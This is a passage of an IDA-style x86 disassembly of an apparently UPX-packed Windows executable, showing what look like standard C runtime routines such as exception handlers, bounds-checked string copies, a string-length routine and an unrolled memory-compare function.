call sub_404FAE
add esp, 0Ch
jmp short loc_4024A7
; ---------------------------------------------------------------------------
loc_40249E: ; CODE XREF: sub_402457+1E�j
and dword ptr [esi+4], 0
jmp short loc_4024A7
; ---------------------------------------------------------------------------
loc_4024A4: ; CODE XREF: sub_402457+1A�j
mov [esi+4], eax
loc_4024A7: ; CODE XREF: sub_402457+36�j
; sub_402457+45�j ...
pop edi
mov eax, esi
pop esi
pop ebx
retn 4
sub_402457 endp
; =============== S U B R O U T I N E =======================================
sub_4024AF proc near ; CODE XREF: sub_4012A3+6�j
; UPX0:004012B7�p ...
cmp dword ptr [ecx+8], 0
mov dword ptr [ecx], offset off_40C1CC
jz short locret_4024C4
push dword ptr [ecx+4]
call sub_404F20
pop ecx
locret_4024C4: ; CODE XREF: sub_4024AF+A�j
retn
sub_4024AF endp
; =============== S U B R O U T I N E =======================================
sub_4024C5 proc near ; DATA XREF: UPX0:0040C178�o
; UPX0:0040C1D0�o ...
mov eax, [ecx+4]
test eax, eax
jnz short locret_4024D1
mov eax, offset aUnknownExcepti ; "Unknown exception"
locret_4024D1: ; CODE XREF: sub_4024C5+5�j
retn
sub_4024C5 endp
; ---------------------------------------------------------------------------
loc_4024D2: ; DATA XREF: UPX0:off_40C1CC�o
push esi
mov esi, ecx
call sub_4024AF
test byte ptr [esp+8], 1
jz short loc_4024E8
push esi
call sub_4023DB
pop ecx
loc_4024E8: ; CODE XREF: UPX0:004024DF�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4024EE proc near ; CODE XREF: sub_40126B+F�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_C]
push edi
xor edi, edi
cmp esi, edi
jnz short loc_402500
loc_4024FC: ; CODE XREF: sub_4024EE+4B�j
xor eax, eax
jmp short loc_402565
; ---------------------------------------------------------------------------
loc_402500: ; CODE XREF: sub_4024EE+C�j
cmp [ebp+arg_0], edi
jnz short loc_402520
loc_402505: ; CODE XREF: sub_4024EE+5F�j
call sub_4053C0
push 16h
pop esi
mov [eax], esi
loc_40250F: ; CODE XREF: sub_4024EE+72�j
push edi
push edi
push edi
push edi
push edi
call sub_402191
add esp, 14h
mov eax, esi
jmp short loc_402565
; ---------------------------------------------------------------------------
loc_402520: ; CODE XREF: sub_4024EE+15�j
cmp [ebp+arg_8], edi
jz short loc_40253B
cmp [ebp+arg_4], esi
jb short loc_40253B
push esi
push [ebp+arg_8]
push [ebp+arg_0]
call sub_405020
add esp, 0Ch
jmp short loc_4024FC
; ---------------------------------------------------------------------------
loc_40253B: ; CODE XREF: sub_4024EE+35�j
; sub_4024EE+3A�j
push [ebp+arg_4]
push edi
push [ebp+arg_0]
call sub_4021D0
add esp, 0Ch
cmp [ebp+arg_8], edi
jz short loc_402505
cmp [ebp+arg_4], esi
jnb short loc_402562
call sub_4053C0
push 22h
pop ecx
mov [eax], ecx
mov esi, ecx
jmp short loc_40250F
; ---------------------------------------------------------------------------
loc_402562: ; CODE XREF: sub_4024EE+64�j
push 16h
pop eax
loc_402565: ; CODE XREF: sub_4024EE+10�j
; sub_4024EE+30�j
pop edi
pop esi
pop ebp
retn
sub_4024EE endp
; =============== S U B R O U T I N E =======================================
sub_402569 proc near ; CODE XREF: sub_402651+18�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
push ecx
push ebx
push ebp
push esi
push edi
push ds:dword_410A08
call sub_40470B
push ds:dword_410A04
mov esi, eax
mov [esp+1Ch+var_4], esi
call sub_40470B
mov edi, eax
cmp edi, esi
pop ecx
pop ecx
jb loc_40261A
mov ebx, edi
sub ebx, esi
lea ebp, [ebx+4]
cmp ebp, 4
jb short loc_40261A
push esi
call sub_4054A6
mov esi, eax
cmp esi, ebp
pop ecx
jnb short loc_4025F9
mov eax, 800h
cmp esi, eax
jnb short loc_4025BA
mov eax, esi
loc_4025BA: ; CODE XREF: sub_402569+4D�j
add eax, esi
cmp eax, esi
jb short loc_4025D0
push eax
push [esp+18h+var_4]
call sub_40545B
test eax, eax
pop ecx
pop ecx
jnz short loc_4025E7
loc_4025D0: ; CODE XREF: sub_402569+55�j
lea eax, [esi+10h]
cmp eax, esi
jb short loc_40261A
push eax
push [esp+18h+var_4]
call sub_40545B
test eax, eax
pop ecx
pop ecx
jz short loc_40261A
loc_4025E7: ; CODE XREF: sub_402569+65�j
sar ebx, 2
push eax
lea edi, [eax+ebx*4]
call sub_404694
pop ecx
mov ds:dword_410A08, eax
loc_4025F9: ; CODE XREF: sub_402569+44�j
push [esp+14h+arg_0]
call sub_404694
mov [edi], eax
add edi, 4
push edi
call sub_404694
pop ecx
mov ds:dword_410A04, eax
mov eax, [esp+18h+arg_0]
pop ecx
jmp short loc_40261C
; ---------------------------------------------------------------------------
loc_40261A: ; CODE XREF: sub_402569+27�j
; sub_402569+37�j ...
xor eax, eax
loc_40261C: ; CODE XREF: sub_402569+AF�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
sub_402569 endp
; =============== S U B R O U T I N E =======================================
sub_402622 proc near ; DATA XREF: UPX0:0040C144�o
push esi
push 4
push 20h
call sub_405413
mov esi, eax
push esi
call sub_404694
add esp, 0Ch
test esi, esi
mov ds:dword_410A08, eax
mov ds:dword_410A04, eax
jnz short loc_40264A
push 18h
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40264A: ; CODE XREF: sub_402622+21�j
and dword ptr [esi], 0
xor eax, eax
pop esi
retn
sub_402622 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402651 proc near ; CODE XREF: sub_40268D+4�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset dword_40DE58
call __SEH_prolog4
call sub_4055A8
and [ebp+ms_exc.disabled], 0
push [ebp+arg_0]
call sub_402569
pop ecx
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_402687
mov eax, [ebp+var_1C]
call __SEH_epilog4
retn
sub_402651 endp
; =============== S U B R O U T I N E =======================================
sub_402687 proc near ; CODE XREF: sub_402651+28�p
; DATA XREF: UPX1:0040DE70�o
call sub_4055B1
retn
sub_402687 endp
; =============== S U B R O U T I N E =======================================
sub_40268D proc near ; CODE XREF: sub_402371+45�p
; sub_405665+44�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_402651
neg eax
sbb eax, eax
neg eax
pop ecx
dec eax
retn
sub_40268D endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4026A0 proc near ; CODE XREF: sub_401964+7�p
; sub_401D77+24�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_4026D0
loc_4026AC: ; CODE XREF: sub_4026A0+1B�j
mov al, [ecx]
add ecx, 1
test al, al
jz short loc_402703
test ecx, 3
jnz short loc_4026AC
add eax, 0
lea esp, [esp+0]
lea esp, [esp+0]
loc_4026D0: ; CODE XREF: sub_4026A0+A�j
; sub_4026A0+46�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_4026D0
mov eax, [ecx-4]
test al, al
jz short loc_402721
test ah, ah
jz short loc_402717
test eax, 0FF0000h
jz short loc_40270D
test eax, 0FF000000h
jz short loc_402703
jmp short loc_4026D0
; ---------------------------------------------------------------------------
loc_402703: ; CODE XREF: sub_4026A0+13�j
; sub_4026A0+5F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_40270D: ; CODE XREF: sub_4026A0+58�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_402717: ; CODE XREF: sub_4026A0+51�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_402721: ; CODE XREF: sub_4026A0+4D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_4026A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40272B proc near ; CODE XREF: sub_401287+F�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_C]
push esi
push edi
xor edi, edi
cmp eax, edi
jz short loc_402780
cmp [ebp+arg_0], edi
jnz short loc_402759
loc_40273E: ; CODE XREF: sub_40272B+31�j
call sub_4053C0
push 16h
pop esi
mov [eax], esi
loc_402748: ; CODE XREF: sub_40272B+44�j
push edi
push edi
push edi
push edi
push edi
call sub_402191
add esp, 14h
mov eax, esi
jmp short loc_402782
; ---------------------------------------------------------------------------
loc_402759: ; CODE XREF: sub_40272B+11�j
cmp [ebp+arg_8], edi
jz short loc_40273E
cmp [ebp+arg_4], eax
jnb short loc_402771
call sub_4053C0
push 22h
pop ecx
mov [eax], ecx
mov esi, ecx
jmp short loc_402748
; ---------------------------------------------------------------------------
loc_402771: ; CODE XREF: sub_40272B+36�j
push eax
push [ebp+arg_8]
push [ebp+arg_0]
call sub_405A70
add esp, 0Ch
loc_402780: ; CODE XREF: sub_40272B+C�j
xor eax, eax
loc_402782: ; CODE XREF: sub_40272B+2C�j
pop edi
pop esi
pop ebp
retn
sub_40272B endp
; =============== S U B R O U T I N E =======================================
sub_402786 proc near ; CODE XREF: UPX0:00402797�p
push ecx
mov dword ptr [ecx], offset off_40C1EC
call sub_405DD5
pop ecx
retn
sub_402786 endp
; ---------------------------------------------------------------------------
loc_402794: ; DATA XREF: UPX0:off_40C1EC�o
push esi
mov esi, ecx
call sub_402786
test byte ptr [esp+8], 1
jz short loc_4027AA
push esi
call sub_4023DB
pop ecx
loc_4027AA: ; CODE XREF: UPX0:004027A1�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_4027B0 proc near ; CODE XREF: sub_407321+12D�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add ecx, 9
push ecx
add eax, 9
push eax
call sub_405E50
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
retn 4
sub_4027B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4027CB proc near ; CODE XREF: sub_401D77+37�p
; sub_405F23+F1�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_0]
xor ebx, ebx
cmp [ebp+arg_C], ebx
push edi
jnz short loc_4027EB
cmp esi, ebx
jnz short loc_4027EF
cmp [ebp+arg_4], ebx
jnz short loc_4027F6
loc_4027E4: ; CODE XREF: sub_4027CB+4D�j
; sub_4027CB+8C�j
xor eax, eax
loc_4027E6: ; CODE XREF: sub_4027CB+44�j
; sub_4027CB+9E�j
pop edi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4027EB: ; CODE XREF: sub_4027CB+E�j
cmp esi, ebx
jz short loc_4027F6
loc_4027EF: ; CODE XREF: sub_4027CB+12�j
mov edi, [ebp+arg_4]
cmp edi, ebx
ja short loc_402811
loc_4027F6: ; CODE XREF: sub_4027CB+17�j
; sub_4027CB+22�j ...
call sub_4053C0
push 16h
pop esi
mov [eax], esi
loc_402800: ; CODE XREF: sub_4027CB+B1�j
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402191
add esp, 14h
mov eax, esi
jmp short loc_4027E6
; ---------------------------------------------------------------------------
loc_402811: ; CODE XREF: sub_4027CB+29�j
cmp [ebp+arg_C], ebx
jnz short loc_40281A
mov [esi], bl
jmp short loc_4027E4
; ---------------------------------------------------------------------------
loc_40281A: ; CODE XREF: sub_4027CB+49�j
mov edx, [ebp+arg_8]
cmp edx, ebx
jnz short loc_402825
mov [esi], bl
jmp short loc_4027F6
; ---------------------------------------------------------------------------
loc_402825: ; CODE XREF: sub_4027CB+54�j
cmp [ebp+arg_C], 0FFFFFFFFh
mov eax, esi
jnz short loc_40283C
loc_40282D: ; CODE XREF: sub_4027CB+6D�j
mov cl, [edx]
mov [eax], cl
inc eax
inc edx
cmp cl, bl
jz short loc_402855
dec edi
jnz short loc_40282D
jmp short loc_402855
; ---------------------------------------------------------------------------
loc_40283C: ; CODE XREF: sub_4027CB+60�j
; sub_4027CB+81�j
mov cl, [edx]
mov [eax], cl
inc eax
inc edx
cmp cl, bl
jz short loc_40284E
dec edi
jz short loc_40284E
dec [ebp+arg_C]
jnz short loc_40283C
loc_40284E: ; CODE XREF: sub_4027CB+79�j
; sub_4027CB+7C�j
cmp [ebp+arg_C], ebx
jnz short loc_402855
mov [eax], bl
loc_402855: ; CODE XREF: sub_4027CB+6A�j
; sub_4027CB+6F�j ...
cmp edi, ebx
jnz short loc_4027E4
cmp [ebp+arg_C], 0FFFFFFFFh
jnz short loc_40286E
mov eax, [ebp+arg_4]
push 50h
mov [esi+eax-1], bl
pop eax
jmp loc_4027E6
; ---------------------------------------------------------------------------
loc_40286E: ; CODE XREF: sub_4027CB+92�j
mov [esi], bl
call sub_4053C0
push 22h
pop ecx
mov [eax], ecx
mov esi, ecx
jmp short loc_402800
sub_4027CB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40287E proc near ; CODE XREF: sub_401E85+6A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_8]
mov eax, edi
sub eax, 0
jz loc_403E76
dec eax
jz loc_403E65
dec eax
jz loc_403E37
dec eax
jz loc_403DEF
dec eax
jz loc_403D66
mov ecx, [ebp+arg_4]
mov eax, [ebp+arg_0]
push ebx
push 20h
pop edx
jmp loc_402D2E
; ---------------------------------------------------------------------------
loc_4028BC: ; CODE XREF: sub_40287E+4B2�j
mov esi, [eax]
cmp esi, [ecx]
jz short loc_40293E
movzx esi, byte ptr [eax]
movzx ebx, byte ptr [ecx]
sub esi, ebx
jz short loc_4028E1
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, [ebx+ebx-1]
mov esi, ebx
test esi, esi
jnz loc_402D4A
loc_4028E1: ; CODE XREF: sub_40287E+4C�j
movzx esi, byte ptr [eax+1]
movzx ebx, byte ptr [ecx+1]
sub esi, ebx
jz short loc_402902
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, [ebx+ebx-1]
mov esi, ebx
test esi, esi
jnz loc_402D4A
loc_402902: ; CODE XREF: sub_40287E+6D�j
movzx esi, byte ptr [eax+2]
movzx ebx, byte ptr [ecx+2]
sub esi, ebx
jz short loc_402923
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, [ebx+ebx-1]
mov esi, ebx
test esi, esi
jnz loc_402D4A
loc_402923: ; CODE XREF: sub_40287E+8E�j
movzx esi, byte ptr [eax+3]
movzx ebx, byte ptr [ecx+3]
sub esi, ebx
jz short loc_402940
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, [ebx+ebx-1]
mov esi, ebx
jmp short loc_402940
; ---------------------------------------------------------------------------
loc_40293E: ; CODE XREF: sub_40287E+42�j
xor esi, esi
loc_402940: ; CODE XREF: sub_40287E+AF�j
; sub_40287E+BE�j
test esi, esi
jnz loc_402D4A
mov esi, [eax+4]
cmp esi, [ecx+4]
jz short loc_4029CE
movzx esi, byte ptr [eax+4]
movzx ebx, byte ptr [ecx+4]
sub esi, ebx
jz short loc_402971
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, [ebx+ebx-1]
mov esi, ebx
test esi, esi
jnz loc_402D4A
loc_402971: ; CODE XREF: sub_40287E+DC�j
movzx esi, byte ptr [eax+5]
movzx ebx, byte ptr [ecx+5]
sub esi, ebx
jz short loc_402992
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, [ebx+ebx-1]
mov esi, ebx
test esi, esi
jnz loc_402D4A
loc_402992: ; CODE XREF: sub_40287E+FD�j
movzx esi, byte ptr [eax+6]
movzx ebx, byte ptr [ecx+6]
sub esi, ebx
jz short loc_4029B3
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, [ebx+ebx-1]
mov esi, ebx
test esi, esi
jnz loc_402D4A
loc_4029B3: ; CODE XREF: sub_40287E+11E�j
movzx esi, byte ptr [eax+7]
movzx ebx, byte ptr [ecx+7]
sub esi, ebx
jz short loc_4029D0
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, [ebx+ebx-1]
mov esi, ebx
jmp short loc_4029D0
; ---------------------------------------------------------------------------
loc_4029CE: ; CODE XREF: sub_40287E+D0�j
xor esi, esi
loc_4029D0: ; CODE XREF: sub_40287E+13F�j
; sub_40287E+14E�j
test esi, esi
jnz loc_402D4A
mov esi, [eax+8]
cmp esi, [ecx+8]
jz short loc_402A5E
movzx esi, byte ptr [eax+8]
movzx ebx, byte ptr [ecx+8]
sub esi, ebx
jz short loc_402A01
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, [ebx+ebx-1]
mov esi, ebx
test esi, esi
jnz loc_402D4A
loc_402A01: ; CODE XREF: sub_40287E+16C�j
movzx esi, byte ptr [eax+9]
movzx ebx, byte ptr [ecx+9]
sub esi, ebx
jz short loc_402A22
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, [ebx+ebx-1]
mov esi, ebx
test esi, esi
jnz loc_402D4A
loc_402A22: ; CODE XREF: sub_40287E+18D�j
movzx esi, byte ptr [eax+0Ah]
movzx ebx, byte ptr [ecx+0Ah]
sub esi, ebx
jz short loc_402A43
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, [ebx+ebx-1]
mov esi, ebx
test esi, esi
jnz loc_402D4A
loc_402A43: ; CODE XREF: sub_40287E+1AE�j
movzx esi, byte ptr [eax+0Bh]
movzx ebx, byte ptr [ecx+0Bh]
sub esi, ebx
jz short loc_402A60
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, [ebx+ebx-1]
mov esi, ebx
jmp short loc_402A60
; ---------------------------------------------------------------------------
loc_402A5E: ; CODE XREF: sub_40287E+160�j
xor esi, esi
loc_402A60: ; CODE XREF: sub_40287E+1CF�j
; sub_40287E+1DE�j
test esi, esi
jnz loc_402D4A
mov esi, [eax+0Ch]
cmp esi, [ecx+0Ch]
jz short loc_402AEE
movzx esi, byte ptr [eax+0Ch]
movzx ebx, byte ptr [ecx+0Ch]
sub esi, ebx
jz short loc_402A91
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, [ebx+ebx-1]
mov esi, ebx
test esi, esi
jnz loc_402D4A
loc_402A91: ; CODE XREF: sub_40287E+1FC�j
movzx esi, byte ptr [eax+0Dh]
movzx ebx, byte ptr [ecx+0Dh]
sub esi, ebx
jz short loc_402AB2
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, [ebx+ebx-1]
mov esi, ebx
test esi, esi
jnz loc_402D4A
loc_402AB2: ; CODE XREF: sub_40287E+21D�j
movzx esi, byte ptr [eax+0Eh]
movzx ebx, byte ptr [ecx+0Eh]
sub esi, ebx
jz short loc_402AD3
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, [ebx+ebx-1]
mov esi, ebx
test esi, esi
jnz loc_402D4A
loc_402AD3: ; CODE XREF: sub_40287E+23E�j
movzx esi, byte ptr [eax+0Fh]
movzx ebx, byte ptr [ecx+0Fh]
sub esi, ebx
jz short loc_402AF0
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, [ebx+ebx-1]
mov esi, ebx
jmp short loc_402AF0
; ---------------------------------------------------------------------------
loc_402AEE: ; CODE XREF: sub_40287E+1F0�j
xor esi, esi
loc_402AF0: ; CODE XREF: sub_40287E+25F�j
; sub_40287E+26E�j
test esi, esi
jnz loc_402D4A
mov esi, [eax+10h]
cmp esi, [ecx+10h]
jz short loc_402B7E
movzx ebx, byte ptr [ecx+10h]
movzx esi, byte ptr [eax+10h]
sub esi, ebx
jz short loc_402B21
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, [ebx+ebx-1]
mov esi, ebx
test esi, esi
jnz loc_402D4A
loc_402B21: ; CODE XREF: sub_40287E+28C�j
movzx esi, byte ptr [eax+11h]
movzx ebx, byte ptr [ecx+11h]
sub esi, ebx
jz short loc_402B42
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, [ebx+ebx-1]
mov esi, ebx
test esi, esi
jnz loc_402D4A
loc_402B42: ; CODE XREF: sub_40287E+2AD�j
movzx esi, byte ptr [eax+12h]
movzx ebx, byte ptr [ecx+12h]
sub esi, ebx
jz short loc_402B63
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, [ebx+ebx-1]
mov esi, ebx
test esi, esi
jnz loc_402D4A
loc_402B63: ; CODE XREF: sub_40287E+2CE�j
movzx esi, byte ptr [eax+13h]
movzx ebx, byte ptr [ecx+13h]
sub esi, ebx
jz short loc_402B80
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, [ebx+ebx-1]
mov esi, ebx
jmp short loc_402B80
; ---------------------------------------------------------------------------
loc_402B7E: ; CODE XREF: sub_40287E+280�j
xor esi, esi
loc_402B80: ; CODE XREF: sub_40287E+2EF�j
; sub_40287E+2FE�j
test esi, esi
jnz loc_402D4A
mov esi, [eax+14h]
cmp esi, [ecx+14h]
jz short loc_402C0E
movzx esi, byte ptr [eax+14h]
movzx ebx, byte ptr [ecx+14h]
sub esi, ebx
jz short loc_402BB1
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, [ebx+ebx-1]
mov esi, ebx
test esi, esi
jnz loc_402D4A
loc_402BB1: ; CODE XREF: sub_40287E+31C�j
movzx esi, byte ptr [eax+15h]
movzx ebx, byte ptr [ecx+15h]
sub esi, ebx
jz short loc_402BD2
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, [ebx+ebx-1]
mov esi, ebx
test esi, esi
jnz loc_402D4A
loc_402BD2: ; CODE XREF: sub_40287E+33D�j
movzx esi, byte ptr [eax+16h]
movzx ebx, byte ptr [ecx+16h]
sub esi, ebx
jz short loc_402BF3
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, [ebx+ebx-1]
mov esi, ebx
test esi, esi
jnz loc_402D4A
loc_402BF3: ; CODE XREF: sub_40287E+35E�j
movzx esi, byte ptr [eax+17h]
movzx ebx, byte ptr [ecx+17h]
sub esi, ebx
jz short loc_402C10
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, [ebx+ebx-1]
mov esi, ebx
jmp short loc_402C10
; ---------------------------------------------------------------------------
loc_402C0E: ; CODE XREF: sub_40287E+310�j
xor esi, esi
loc_402C10: ; CODE XREF: sub_40287E+37F�j
; sub_40287E+38E�j
test esi, esi
jnz loc_402D4A
mov esi, [eax+18h]
cmp esi, [ecx+18h]
jz short loc_402C9E
movzx esi, byte ptr [eax+18h]
movzx ebx, byte ptr [ecx+18h]
sub esi, ebx
jz short loc_402C41
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, [ebx+ebx-1]
mov esi, ebx
test esi, esi
jnz loc_402D4A
loc_402C41: ; CODE XREF: sub_40287E+3AC�j
movzx esi, byte ptr [eax+19h]
movzx ebx, byte ptr [ecx+19h]
sub esi, ebx
jz short loc_402C62
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, [ebx+ebx-1]
mov esi, ebx
test esi, esi
jnz loc_402D4A
loc_402C62: ; CODE XREF: sub_40287E+3CD�j
movzx esi, byte ptr [eax+1Ah]
movzx ebx, byte ptr [ecx+1Ah]
sub esi, ebx
jz short loc_402C83
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, [ebx+ebx-1]
mov esi, ebx
test esi, esi
jnz loc_402D4A
loc_402C83: ; CODE XREF: sub_40287E+3EE�j
movzx esi, byte ptr [eax+1Bh]
movzx ebx, byte ptr [ecx+1Bh]
sub esi, ebx
jz short loc_402CA0
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, [ebx+ebx-1]
mov esi, ebx
jmp short loc_402CA0
; ---------------------------------------------------------------------------
loc_402C9E: ; CODE XREF: sub_40287E+3A0�j
xor esi, esi
loc_402CA0: ; CODE XREF: sub_40287E+40F�j
; sub_40287E+41E�j
test esi, esi
jnz loc_402D4A
mov esi, [eax+1Ch]
cmp esi, [ecx+1Ch]
jz short loc_402D22
movzx esi, byte ptr [eax+1Ch]
movzx ebx, byte ptr [ecx+1Ch]
sub esi, ebx
jz short loc_402CCD
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, [ebx+ebx-1]
mov esi, ebx
test esi, esi
jnz short loc_402D4A
loc_402CCD: ; CODE XREF: sub_40287E+43C�j
movzx esi, byte ptr [eax+1Dh]
movzx ebx, byte ptr [ecx+1Dh]
sub esi, ebx
jz short loc_402CEA
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, [ebx+ebx-1]
mov esi, ebx
test esi, esi
jnz short loc_402D4A
loc_402CEA: ; CODE XREF: sub_40287E+459�j
movzx esi, byte ptr [eax+1Eh]
movzx ebx, byte ptr [ecx+1Eh]
sub esi, ebx
jz short loc_402D07
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, [ebx+ebx-1]
mov esi, ebx
test esi, esi
jnz short loc_402D4A
loc_402D07: ; CODE XREF: sub_40287E+476�j
movzx esi, byte ptr [eax+1Fh]
movzx ebx, byte ptr [ecx+1Fh]
sub esi, ebx
jz short loc_402D24
xor ebx, ebx
test esi, esi
setnle bl
lea ebx, [ebx+ebx-1]
mov esi, ebx
jmp short loc_402D24
; ---------------------------------------------------------------------------
loc_402D22: ; CODE XREF: sub_40287E+430�j
xor esi, esi
loc_402D24: ; CODE XREF: sub_40287E+493�j
; sub_40287E+4A2�j
test esi, esi
jnz short loc_402D4A
add eax, edx
add ecx, edx
sub edi, edx
loc_402D2E: ; CODE XREF: sub_40287E+39�j
cmp edi, edx
jnb loc_4028BC
add eax, edi
add ecx, edi
cmp edi, 1Fh ; switch 32 cases
ja loc_40311D ; default
; jumptable 00402D43 case 0
jmp off_403E7E[edi*4] ; switch jump
; ---------------------------------------------------------------------------
loc_402D4A: ; CODE XREF: sub_40287E+5D�j
; sub_40287E+7E�j ...
mov eax, esi
jmp loc_40311F
; ---------------------------------------------------------------------------
loc_402D51: ; CODE XREF: sub_40287E+4C5�j
; DATA XREF: UPX0:off_403E7E�o
mov edx, [eax-1Ch] ; jumptable 00402D43 case 28
cmp edx, [ecx-1Ch]
jz short loc_402DCA
movzx esi, dl
movzx edx, byte ptr [ecx-1Ch]
sub esi, edx
jz short loc_402D75
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz short loc_402D4A
loc_402D75: ; CODE XREF: sub_40287E+4E4�j
movzx esi, byte ptr [eax-1Bh]
movzx edx, byte ptr [ecx-1Bh]
sub esi, edx
jz short loc_402D92
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz short loc_402D4A
loc_402D92: ; CODE XREF: sub_40287E+501�j
movzx esi, byte ptr [eax-1Ah]
movzx edx, byte ptr [ecx-1Ah]
sub esi, edx
jz short loc_402DAF
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz short loc_402D4A
loc_402DAF: ; CODE XREF: sub_40287E+51E�j
movzx esi, byte ptr [eax-19h]
movzx edx, byte ptr [ecx-19h]
sub esi, edx
jz short loc_402DCC
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
jmp short loc_402DCC
; ---------------------------------------------------------------------------
loc_402DCA: ; CODE XREF: sub_40287E+4D9�j
xor esi, esi
loc_402DCC: ; CODE XREF: sub_40287E+53B�j
; sub_40287E+54A�j
test esi, esi
jnz loc_402D4A
loc_402DD4: ; CODE XREF: sub_40287E+4C5�j
; DATA XREF: UPX0:off_403E7E�o
mov edx, [eax-18h] ; jumptable 00402D43 case 24
cmp edx, [ecx-18h]
jz short loc_402E59
movzx esi, dl
movzx edx, byte ptr [ecx-18h]
sub esi, edx
jz short loc_402DFC
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_402DFC: ; CODE XREF: sub_40287E+567�j
movzx esi, byte ptr [eax-17h]
movzx edx, byte ptr [ecx-17h]
sub esi, edx
jz short loc_402E1D
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_402E1D: ; CODE XREF: sub_40287E+588�j
movzx esi, byte ptr [eax-16h]
movzx edx, byte ptr [ecx-16h]
sub esi, edx
jz short loc_402E3E
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
test esi, esi
jnz loc_402D4A
loc_402E3E: ; CODE XREF: sub_40287E+5A9�j
movzx esi, byte ptr [eax-15h]
movzx edx, byte ptr [ecx-15h]
sub esi, edx
jz short loc_402E5B
xor edx, edx
test esi, esi
setnle dl
lea edx, [edx+edx-1]
mov esi, edx
jmp short loc_402E5B
; ---------------------------------------------------------------------------
loc_402E59: ; CODE XREF: sub_40287E+55C�j
xor esi, esi
loc_402E5B: ; CODE XREF: sub_40287E+5CA�j
; sub_40287E+5D9�j
test esi, esi
jnz loc_402D4A
loc_402E63: ; CODE XREF: sub_40287E+4C5�j
; DATA XREF: UPX0:off_403E7E�o
mov edx, [eax-14h] ; jumptable 00402D43 case 20
cmp edx, [ecx-14h]
jz short loc_402EE8
movzx esi, dl
